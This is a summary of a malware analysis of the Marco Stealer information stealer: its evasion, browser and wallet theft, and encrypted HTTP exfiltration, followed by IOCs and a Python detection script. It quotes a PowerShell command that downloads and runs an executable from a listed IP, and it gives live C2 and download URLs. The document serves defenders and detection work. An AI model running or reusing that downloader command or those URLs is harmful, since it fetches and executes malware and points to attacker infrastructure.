Zscaler ThreatLabz discovered Marco Stealer in June 2025, an information stealer that primarily exfiltrates browser data, cryptocurrency wallet data from extensions, and sensitive files from local and cloud storage. The malware uses ARX-based runtime string decryption, anti-analysis checks that terminate tools like x64dbg and Wireshark, named pipes and DLL injection to extract browser and wallet data, and sends AES-256–encrypted data to HTTP C2 endpoints. #MarcoStealer #Zscaler
Keypoints
- Discovered in June 2025, Marco Stealer targets browser data, cryptocurrency wallet information stored in extensions, and sensitive files from local and cloud services.
- The malware employs ARX-style string encryption (decrypted at runtime) and uses Windows APIs to detect and terminate anti-analysis/security tools like x64dbg, Wireshark, and Process Hacker.
- Marco Stealer builds a detailed machine profile (hardware ID, OS version, IP address, geolocation) and verifies internet connectivity before proceeding; it self-deletes if offline.
- Two browser-exfiltration methods are used: chromeDecryptor.dll (extracts the Chrome App-Bound encryption key) via DLL injection, and needMe.exe communicating over a named pipe (\\.\pipe\FirefoxBrowserExtractor) to harvest browser SQLite data.
- The stealer searches common user and cloud directories, captures clipboard and screenshots, and targets many services and apps (Discord, Telegram, VPNs, password managers, Steam, Outlook) for data extraction.
- Stolen data is encrypted with AES-256 CBC (key derived from a hardcoded value via SHA-256 + CryptDeriveKey) and exfiltrated via HTTP POST to predefined C2 endpoints.
- Zscaler Cloud Sandbox detects the campaign (threat names Win64.Downloader.Marco and Win64.PWS.Marco) and published multiple IOCs including download URLs, C2 IPs, file hashes, and dropped filenames.
MITRE Techniques
- [T1047] Windows Management Instrumentation – Used to enumerate antivirus products and gather security product information via WMI and COM interactions ('Marco Stealer performs Component Object Model (COM) interactions using DllCanUnloadNow and runs a Windows Management Instrumentation (WMI) query (SELECT * FROM AntiVirusProduct) to enumerate all active antivirus products')
- [T1016] System Network Configuration Discovery – Used to obtain the victim's external IP and country code by querying public IP/geolocation services ('Marco Stealer queries services like https://ipinfo.io/ip and https://ipinfo.io/country to retrieve the external IP address and country code')
- [T1071] Application Layer Protocol – Uses HTTP for command-and-control and data exfiltration to blend with application-layer traffic ('the encrypted data … is then sent to the predefined C2 endpoint (e.g., http://45.74.19[.]20:49259/receive) via an HTTP POST request with HTTP User-Agent field set to DataSender')
- [T1059] Command and Scripting Interpreter – Abuses PowerShell to download and execute the next-stage payload via a generated command ('powershell.exe -ExecutionPolicy ByPass -Command "$client = New-Object System.Net.WebClient; $client.Headers.Add('X-Custom-Auth', …); $client.DownloadFile('http://217.156.50.228:8181/…/PNcWncSY.exe', 'C:\Users\PJones\AppData\Local\Temp\knmQSGUZ\FILhFvaZ.exe'); Start-Process 'C:\Users\PJones\AppData\Local\Temp\knmQSGUZ\FILhFvaZ.exe'"')
- [T1057] Process Discovery – Enumerates running processes and retrieves executable paths/metadata to identify and terminate analysis tools and targeted browsers ('Marco Stealer enumerates running processes and retrieves their executable file paths' and 'If any of the metadata collected matches the name of a common anti-analysis tool such as x64dbg, Wireshark, Process Hacker, or OllyDbg, Marco Stealer terminates the corresponding process')
- [T1105] Ingress Tool Transfer – Downloads binaries from remote URLs and extracts embedded resources to disk for execution (e.g., the downloader fetching the main executable and extracting chromeDecryptor.dll/needMe.exe from resources) ('the WebClient object downloads the Marco Stealer executable file from the URL http://217.156.50.228:8181/…/PNcWncSY.exe to the temporary path … and executes it')
- [T1082] System Information Discovery – Collects system and hardware details (machine GUID, OS version, RAM, CPU, GPU, installed software) to build an infection profile ('Marco Stealer builds a profile of the victim's machine by collecting system information such as hardware ID and operating system version, as well as the victim's IP address and geographical location')
- [T1573] Encrypted Channel – Protects stolen data using AES-256 CBC encryption with a key derived from a hardcoded value to conceal exfiltrated content ('Marco Stealer uses AES-256 CBC encryption … generates a SHA-256 hash of a hardcoded value … used to derive an AES-256 encryption key via the CryptDeriveKey function')
- [T1518.001] Security Software Discovery – Scans Windows Security Center registry paths and runs queries to enumerate installed AV/EDR products and other security tools for evasion/termination ('Marco Stealer looks for antivirus software by scanning the Windows Security Center registry path (ROOT\SecurityCenter2) … runs a WMI query (SELECT * FROM AntiVirusProduct) to enumerate all active antivirus products')
Indicators of Compromise
- [URL / Downloading URL] downloader URL – http://217.156.50.228:8181/nujbOqrNYyLXXLmOhPpY/PNcWncSY.exe, http://217.156.50.228:8185/LoqnOOuuIsTIYfkrdsfL/eUelHAyY.exe
- [C2 Server Endpoint] command-and-control – http://45.74.19.20:49259/receive, http://107.189.25.189:49259/receive
- [File Hashes] malware/binary hashes – 34deb6594098545d7ffb98844f0790bf, 3a3e8f6bc70748a39ffc047b3c86a665, and 7 other hashes listed in the report
- [File Names / Dropped Files] payload and resource filenames – chromeDecryptor.dll, needMe.exe (also observed dropped temp filename FILhFvaZ.exe)
- [PDB Path] developer build information – C:\Users\marco\Desktop\Builder\Builder\Client\Client\x64\Release\Client.pdb
- [Mutex] runtime artifact – Global\ItsMeRavenOnYourMachineed
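The indicators above are easiest to operationalise as a handful of small detection rules: the C2 POST to a `/receive` path with the `DataSender` User-Agent (T1071), the PowerShell downloader command shape (T1059/T1105), the dropped file names, and the build-time mutex and PDB artifacts. The script below is an added example written for this summary, not Zscaler's code: the pipe-delimited log format, the `scan`/`check_*` function names and the sample events are all constructed for illustration, and the IP and path values are the ones listed in this summary.

```python
"""Detection helpers for the Marco Stealer indicators summarised above.

Added example (not from the Zscaler report). Log format, function names and
sample events are constructed; indicator values come from the summary.
"""
import re
from dataclasses import dataclass

# Indicators from the summary (written undefanged so they match raw log fields).
C2_HOSTS = {"45.74.19.20", "107.189.25.189"}
DOWNLOAD_HOSTS = {"217.156.50.228"}
DROPPED_FILES = {"chromedecryptor.dll", "needme.exe"}
MUTEX_NAME = "Global\\ItsMeRavenOnYourMachineed"

# Shape of the PowerShell downloader stage: execution-policy bypass, a WebClient
# with a custom auth header, DownloadFile, then Start-Process of the result.
DOWNLOADER_RE = re.compile(
    r"powershell(\.exe)?\s+-ExecutionPolicy\s+ByPass.*?"
    r"New-Object\s+System\.Net\.WebClient.*?"
    r"Headers\.Add\(['\"]X-Custom-Auth['\"].*?"
    r"DownloadFile\(.*?Start-Process",
    re.IGNORECASE | re.DOTALL,
)


@dataclass
class Finding:
    rule: str
    evidence: str


def check_proxy_event(method, host, path, user_agent):
    """T1071: POST to a /receive endpoint with User-Agent 'DataSender', plus known IPs."""
    findings = []
    host_only = host.split(":")[0]  # drop the port for the IP match
    if method.upper() == "POST" and path.rstrip("/").endswith("/receive") and user_agent == "DataSender":
        findings.append(Finding("marco_c2_post", f"{host}{path} UA={user_agent}"))
    if host_only in C2_HOSTS or host_only in DOWNLOAD_HOSTS:
        findings.append(Finding("marco_known_ip", host_only))
    return findings


def check_process_event(image, cmdline):
    """T1059/T1105: downloader command shape and known dropped file names."""
    findings = []
    if DOWNLOADER_RE.search(cmdline):
        findings.append(Finding("marco_ps_downloader", cmdline[:80]))
    name = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if name in DROPPED_FILES:
        findings.append(Finding("marco_dropped_file", image))
    return findings


def check_artifact(kind, value):
    """Mutex name and PDB path are stable build-time artifacts worth a rule."""
    if kind == "mutex" and value == MUTEX_NAME:
        return [Finding("marco_mutex", value)]
    low = value.lower()
    if kind == "pdb" and "\\users\\marco\\desktop\\" in low and low.endswith("client.pdb"):
        return [Finding("marco_pdb", value)]
    return []


def scan(lines):
    """Dispatch constructed 'type|field|...' log lines to the rule functions."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        kind, rest = line.split("|", 1)
        if kind == "proxy":
            method, host, path, ua = rest.split("|", 3)
            findings += check_proxy_event(method, host, path, ua)
        elif kind == "proc":
            image, cmdline = rest.split("|", 1)
            findings += check_process_event(image, cmdline)
        elif kind == "artifact":
            akind, value = rest.split("|", 1)
            findings += check_artifact(akind, value)
    return findings


# Constructed sample events (not real telemetry); the downloader command line
# mirrors the shape quoted in the summary with placeholder file names.
SAMPLE_LOG = """\
proxy|POST|45.74.19.20:49259|/receive|DataSender
proxy|GET|ipinfo.io|/country|Mozilla/5.0
proc|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -ExecutionPolicy ByPass -Command "$client = New-Object System.Net.WebClient; $client.Headers.Add('X-Custom-Auth', 'placeholder'); $client.DownloadFile('http://217.156.50.228:8181/placeholder/x.exe', 'C:\\Users\\u\\AppData\\Local\\Temp\\x.exe'); Start-Process 'C:\\Users\\u\\AppData\\Local\\Temp\\x.exe'"
proc|C:\\Users\\u\\AppData\\Local\\Temp\\needMe.exe|needMe.exe
artifact|mutex|Global\\ItsMeRavenOnYourMachineed
artifact|pdb|C:\\Users\\marco\\Desktop\\Builder\\Builder\\Client\\Client\\x64\\Release\\Client.pdb
proxy|POST|example.com|/receive|Mozilla/5.0
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f.rule}: {f.evidence}")
```

The `/receive` rule deliberately requires the `DataSender` User-Agent as well as the path, since `/receive` alone is common in legitimate traffic (the last sample line shows the benign case producing no finding); the IP match is kept separate so it keeps firing if the operator changes the User-Agent string.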
Read more: https://www.zscaler.com/blogs/security-research/technical-analysis-marco-stealer